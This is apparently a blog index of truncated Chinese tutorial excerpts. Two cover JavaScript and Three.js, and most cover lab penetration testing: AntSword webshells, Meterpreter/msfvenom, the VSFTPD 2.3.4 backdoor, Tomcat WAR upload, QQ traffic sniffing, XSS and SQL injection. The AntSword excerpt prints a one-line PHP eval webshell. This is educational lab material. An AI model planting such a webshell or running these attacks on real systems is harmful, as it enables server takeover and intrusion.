JS书写位置及分类内部书写：书写在body内部、页面元素下方外部导入：书写在页面文件外，使用src导入，内联写法：书写在页面元素内 123456789101112131415161718192021<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8&quo

一、Three.js介绍Three.js是一个基于WebGL的JavaScript库，它使得在网页上创建和显示3D图形变得简单。Three.js提供了一套易于使用的API，封装了WebGL的复杂性，让开发者能够快速地创建3D内容，而无需深入了解WebGL的细节。简而言之就是一个网页端轻量化渲染3d的库，我们可以用它结合VUE\REACT来做一些数字孪生的前端项目。 二、关于Three.js的一些资

一、AntSword介绍AntSword介绍与源码 二、搭建网站并添加木马文件如果某个网站存在木马文件，我们就可以通过蚁剑进行连接这里我用phpstudy在本地搭建的网站里添加木马文件进行演示首先启动服务在网站中管理点击根目录在目录下新建shell.php并写入木马 123<?phpeval($_REQUEST["AntSword"]);?> 访问127.0.0.1

一、MeterpreteMeterpreter是Metasploit Framework中的关键组件，它作为漏洞利用后的攻击载荷，提供纯内存工作模式，无需磁盘写入，且支持加密通信。Meterpreter允许进行进程迁移、密码哈希获取、权限提升等高级渗透测试操作。基本命令如进程迁移、系统信息收集和文件操作。 二、恶意远控软件生成工具：kali(攻击者)，windows11（被攻击者） 1msfven

一、微笑漏洞介绍漏洞服务：VSFTPD 2.3.4，俗称笑脸漏洞。存在于这个2.3.4版本，属于开发者设计上的失误。在检测到用户名带有特殊字符`：）`时，会自动打开6200端口。 二、使用工具攻击机：kali linux靶机：Metasploitable2 三、检测过程1.使用Nmap扫描同网段下的主机，得到靶机ipnmap 192.168.121.0/24 2.在网上找到检测微笑漏洞的pyth

一、Tomcat漏洞原理Tomcat可以在后台部署War文件，默认的后台页面只允许在本地访问，如果内部技术人员手动配置允许其远程访问，在能得到后台管理账户和密码的情况下，攻击者可以上传木马图片，控制主机权限。 二、涉及版本全版本 三、漏洞复现条件1.后台管理页面允许远程访问2.能拿到账户密码 四、复现步骤(搭建容器过程省略)（1）弱口令爆破账号密码1.进入Tomcat后台页面点击Manager

QQ流量分析一、测试条件：两台设备处于同一个局域网下 二、操作步骤使用wireshark工具对局域网流量进行抓包,并查找qq账号来确定qq的流量包可以看到wireshark成功抓到qq的数据包，并可以看到该版本qq使用的协议、源IP以及目标IP接下来使用另外一台设备向开启抓包的设备发送一张.jpg图片知道jpg文件头为ffd8，在wireshark使用十六进制查找可以看到数据块中存在jfif字符，

一、XSS漏洞基础概念XSS——跨站脚本攻击（Cross-Site Scripting），简写本为css，但与层叠样式表（Cascading Style Sheets，CSS）重名，故改为XSS，通常是使用javascript将恶意代码插入前端网页，当用户使用这些网页时，这些被嵌入的恶意代码就会实施攻击。 二、XSS漏洞本质XSS漏洞本质就是将攻击者传递的数据直接或间接使用到前端javascrip

一、SQL爆库，表，字段基础1.select在SQL语句中select username from table where id=1，这条语句执行的在table表中查询并返回id为1的username数据，那select我们可以理解为查询返回的数据，那select 1这条语句我们则可以简单理解为查询并返回1,在简单的无过滤SQL注入题目中如果只有一个回显result：？，输入提交sele

一、SQL注入简介SQL注入是最常见的web漏洞，本质就是前端没有对表单数据做合理性校验，导致前端提交的数据被后端直接当成数据库代码执行，因此攻击者可以构造不同的SQL语句来查询数据库数据。 二、SQL注入条件1.用户能控制传入后端的数据2.web应用程序把数据作为数据库代码执行 三、注入步骤1.数字型注入如果存在注入漏洞，且输入数据类型为整型，则可以认为是数字型注入假设对应SQL语句为selec